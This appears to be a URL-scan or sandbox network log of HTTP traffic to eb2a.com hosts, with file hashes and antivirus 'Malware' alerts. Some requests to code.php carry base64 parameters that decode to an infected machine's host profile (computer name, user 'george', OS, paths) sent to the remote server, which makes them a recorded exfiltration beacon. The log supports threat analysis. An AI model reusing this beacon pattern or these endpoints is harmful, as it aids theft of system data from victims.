www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
199.59.243.223 1.3 kB URL www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
IP 199.59.243.223:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1847), with no line terminators
Hash 7cda92dc12f1f9048b208c27ba9be017
94623fb82ac3057d4fa16f7790a8ae4908e9d1ec
074b991ae3cb0ef7cc347ac0bbfe4641c97b91455ace465712cc97bd9437b353
GET /code.php?mode=cb&usr=Z2Vvcmdl&cb=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 HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f; expires=Sun, 07-May-2023 15:27:07 GMT; Max-Age=900; path=/; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HkebLcw0LkCHh3Upa2QuBEzor07VonRJEMhnXWe4uvKZB08yCcDJomZYBfMYP2uaa8GkuKGiZiUWJr0AdjTuGg==
Accept-CH: sec-ch-prefers-color-scheme
Critical-CH: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.ibayme.eb2a.com/js/parking.2.104.9.js
199.59.243.223 22 kB URL www.ibayme.eb2a.com/js/parking.2.104.9.js
IP 199.59.243.223:0
File type HTML document, ASCII text, with very long lines (65536), with no line terminators
Hash 4373b6882998614499e168219b1e44ca
6591de3f6d18020cc8de3549f9a87115b44bea8b
e93edbb073fa2a6feedcdcec64b6d6b2f9e85b481f11ad8f5a66facac76cb101
Analyzer Verdict Alert fortinet Malware
GET /js/parking.2.104.9.js HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:07 GMT
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 03 May 2023 19:30:26 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.ibayme.eb2a.com/_fd?mode=cb&usr=Z2Vvcmdl&cb=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
199.59.243.223 407 B URL www.ibayme.eb2a.com/_fd?mode=cb&usr=Z2Vvcmdl&cb=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
IP 199.59.243.223:0
File type ASCII text, with very long lines (509), with no line terminators
Hash 9ed9d99cc6d401c54f3541f185648a28
f61a40425bef398fe5b0da6d10be8ec48f6c6cb0
f928af4b58d6763aab0558d8e5a5511be5926c66ece6fc8a4cb40e86aeb6682f
POST /_fd?mode=cb&usr=Z2Vvcmdl&cb=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 HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
Content-Type: application/json
Origin: http://www.ibayme.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:08 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f; expires=Sun, 07-May-2023 15:27:08 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.ibayme.eb2a.com/px.gif?ch=2&rn=9.818423047680234
199.59.243.223 42 B URL www.ibayme.eb2a.com/px.gif?ch=2&rn=9.818423047680234
IP 199.59.243.223:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=2&rn=9.818423047680234 HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:08 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
www.ibayme.eb2a.com/px.gif?ch=1&rn=9.818423047680234
199.59.243.223 42 B URL www.ibayme.eb2a.com/px.gif?ch=1&rn=9.818423047680234
IP 199.59.243.223:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=1&rn=9.818423047680234 HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:08 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
ocsp.pki.goog/gts1c3
142.250.74.3 471 B IP 142.250.74.3:0
Hash 9e0048bfd4dbd888e603799c38403132
0d83fde57ec051b3268d6187be01605080ae9c8a
643718e3659186d0651b6e4bd3c0d138bdb786ab2b455724cb251cfa74d3c5f0
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 07 May 2023 15:12:08 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.ibayme.eb2a.com/favicon.ico
199.59.243.223 0 B URL www.ibayme.eb2a.com/favicon.ico
IP 199.59.243.223:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /favicon.ico HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=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
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:08 GMT
Content-Type: image/x-icon
Content-Length: 0
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
ETag: "61424bb6-0"
x-backend-server: ip-10-201-16-225.ec2.internal
Accept-Ranges: bytes
ocsp.pki.goog/gts1c3
142.250.74.3 472 B IP 142.250.74.3:0
Hash 0235c16024f816c08c15bcd38c1efccf
d7660b46f6a13426c9262608f0822f056e6e95b7
a7f70e8793c5537278b5258cc3de7f3ecb0c2b953ab626974f0a081720dae05d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 07 May 2023 15:12:08 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.ibayme.eb2a.com/_zc
199.59.243.223 168 B IP 199.59.243.223:0
File type ASCII text, with no line terminators
Hash 6a3c3958950137bc452ef214aebd4778
1444dd4b8f72c5b88de972919ed8553fa204cb25
fdc5b736561ac5aea5e570671b462fa81dd856bf89eb0c33f8daec21e055f298
Analyzer Verdict Alert fortinet Malware
POST /_zc HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Content-Type: application/json
Content-Length: 2469
Origin: http://www.ibayme.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:08 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f; expires=Sun, 07-May-2023 15:27:08 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
199.59.243.223 865 B URL User Request GET ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
IP 199.59.243.223:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1211), with no line terminators
Hash 992d992be297dc04da3fb0ab82ae3b36
f0875d8018cf779205b28f1fb1d786f7fe117e9c
6f26f1727e957a4147eafca30f5ca2747ede8aaf8dab26221a89363be6d28edb
GET /?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.ibayme.eb2a.com/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e; expires=Sun, 07-May-2023 15:27:09 GMT; Max-Age=900; path=/; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_V+Q/q0xrPrTevgg3J2ZZBOfuBjv+uduCMyqHwp6117ms3mZcprnv1in/7sAxmQW8FKSvQjZR+yGMiX7CqnZxhg==
Accept-CH: sec-ch-prefers-color-scheme
Critical-CH: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/js/parking.2.104.9.js
199.59.243.223 200 OK 22 kB URL GET HTTP/1.1 ww01.eb2a.com/js/parking.2.104.9.js
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type HTML document, ASCII text, with very long lines (65536), with no line terminators
Hash 4373b6882998614499e168219b1e44ca
6591de3f6d18020cc8de3549f9a87115b44bea8b
e93edbb073fa2a6feedcdcec64b6d6b2f9e85b481f11ad8f5a66facac76cb101
GET /js/parking.2.104.9.js HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 03 May 2023 19:31:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/_fd?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
199.59.243.223 200 OK 211 B URL POST HTTP/1.1 ww01.eb2a.com/_fd?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type ASCII text, with no line terminators
Hash 4e30672eaff6745667e030e8d88dd452
8e121ad51857eecf0a76fbe10ce2377d5e34bc07
08537d74c9f9f829f6b42bc68c8f82828dd87df73b16b5ff1c26fd3ce04e1f43
POST /_fd?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Content-Type: application/json
Origin: http://ww01.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:09 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e; expires=Sun, 07-May-2023 15:27:09 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/px.gif?ch=1&rn=2.670978036161375
199.59.243.223 200 OK 42 B URL GET HTTP/1.1 ww01.eb2a.com/px.gif?ch=1&rn=2.670978036161375
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=1&rn=2.670978036161375 HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
ww01.eb2a.com/px.gif?ch=2&rn=2.670978036161375
199.59.243.223 200 OK 42 B URL GET HTTP/1.1 ww01.eb2a.com/px.gif?ch=2&rn=2.670978036161375
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=2&rn=2.670978036161375 HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
ww01.eb2a.com/favicon.ico
199.59.243.223 200 OK 0 B URL GET HTTP/1.1 ww01.eb2a.com/favicon.ico
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /favicon.ico HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:10 GMT
Content-Type: image/x-icon
Content-Length: 0
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
ETag: "61424bb6-0"
x-backend-server: ip-10-201-16-216.ec2.internal
Accept-Ranges: bytes
ww01.eb2a.com/_tr
199.59.243.223 200 OK 22 B IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type ASCII text, with no line terminators
Hash 5cfde9b47de2d84bd26fc473632647c0
fd53c70631b6068328be57daec71bd94bf004d41
47fd05ef74fef5da03fa22483e63fc977cad8e026ae41dadbbcc3745907f306b
POST /_tr HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Content-Type: application/json
Content-Length: 1353
Origin: http://ww01.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:10 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e; expires=Sun, 07-May-2023 15:27:10 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.google.com/adsense/domains/caf.js
142.250.74.164 200 OK 148 kB URL GET HTTP/3 www.google.com/adsense/domains/caf.js
IP 142.250.74.164:443
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Certificate Issuer Google Trust Services LLC
Subject *.google.com
Fingerprint A3:4E:A3:86:10:DA:6C:D1:8C:73:54:AB:E6:8F:7D:21:72:2C:B4:D5
Validity Mon, 17 Apr 2023 08:16:32 GMT - Mon, 10 Jul 2023 08:16:31 GMT
File type ASCII text, with very long lines (2125)
Size 148 kB (147929 bytes)
Hash d881947769336f52fe658ba09c0d4c0e
9a70d2e2f88177c09cd0b3189c3cfbe510c6958b
69aecdbc51125ae0d89680120aebe1dd469e3449fae524293c2930fbcf3e8970
GET /adsense/domains/caf.js HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/3 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-type: text/javascript; charset=UTF-8
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="ads-afs-ui"
report-to: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
date: Sun, 07 May 2023 15:12:10 GMT
expires: Sun, 07 May 2023 15:12:10 GMT
cache-control: private, max-age=3600
etag: "16991164960581895730"
x-content-type-options: nosniff
content-encoding: gzip
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000